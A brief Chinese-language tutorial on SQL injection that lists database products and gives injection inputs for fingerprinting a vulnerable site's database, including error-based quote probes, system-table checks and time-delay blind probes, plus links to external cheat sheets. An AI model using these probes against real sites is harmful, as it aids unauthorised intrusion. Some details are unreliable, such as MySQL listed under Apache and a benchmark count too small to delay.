SQL注入攻击技巧总结

0×01 你要知道目前有哪些数据库

微软公司旗下的：

Microsoft SQL server 简称 MS-SQL 或者 SQL SERVER （大型数据库操作，功能和性能异常强大）（一般也是ASP或者ASP.NET）

access，微软Office系列产品之一，极小型数据库。功能和性能当然也是相当一般。性能甚至可以说是相当低（常与ASP应用交互）

Oracle公司旗下的：

MySQL 是一个关系型数据库管理系统（常与PHP web应用交互）

Oracle Database，又名Oracle RDBMS，或简称Oracle。是甲骨文公司的一款关系数据库管理系统

Apache旗下的：

MySql

0×02 判断你的web应用是什么类型的数据库

（在可注入的情况下，判断数据库类型）(我以数字型注入为例子)

单引号判断：

id=1′页面出现类似错误显示 “Microsoft JET Database Engine 错误 ’80040e14′” JET 为ACCESS数据库
id=1′页面出现类似错误显示 “Microsoft OLE DB Provider for sql server错误 ‘xxxxxx’ ” 就为MSSQL数据库

条件判断：
id=1 and user>0 出错爆出user用户名的是 MSSQL

如果不爆错，那么我们用以下方式

id=1 and (select count(*) from sysobjects)>0 访回与id=1时页面一样 就为MSSQL数据库

id=1 and (select count(*) from msysobjects)>0 access会返回你没有权限查看

如果也没反应怎么办？

那我们就盲注吧

mysql 盲注语句为 id=1 and if(1=1,benchmark(100,md5(1)),0) //如果可延时执行，为Mysql数据库
mssql 盲注语句为 id=1 and if(1=1) waitfor delay ’00:00:04′;

0×03 针对数据库类型，进行相应的SQL注入攻击

看了下面的文章，你可能知道为什么要分析是web应用是什么数据库啦！

如果你分析为 MYSQL 注入，我推荐你看这篇文章。

http://websec.ca/kb/sql_injection#MySQL_Default_Databases

如果你分析为 MSSQL 注入，我推荐你看这篇文章。

http://websec.ca/kb/sql_injection#MSSQL_Default_Databases

如果你分析为 ORACLE 注入，我推荐你看这篇文章。

http://websec.ca/kb/sql_injection#Oracle_Default_Databases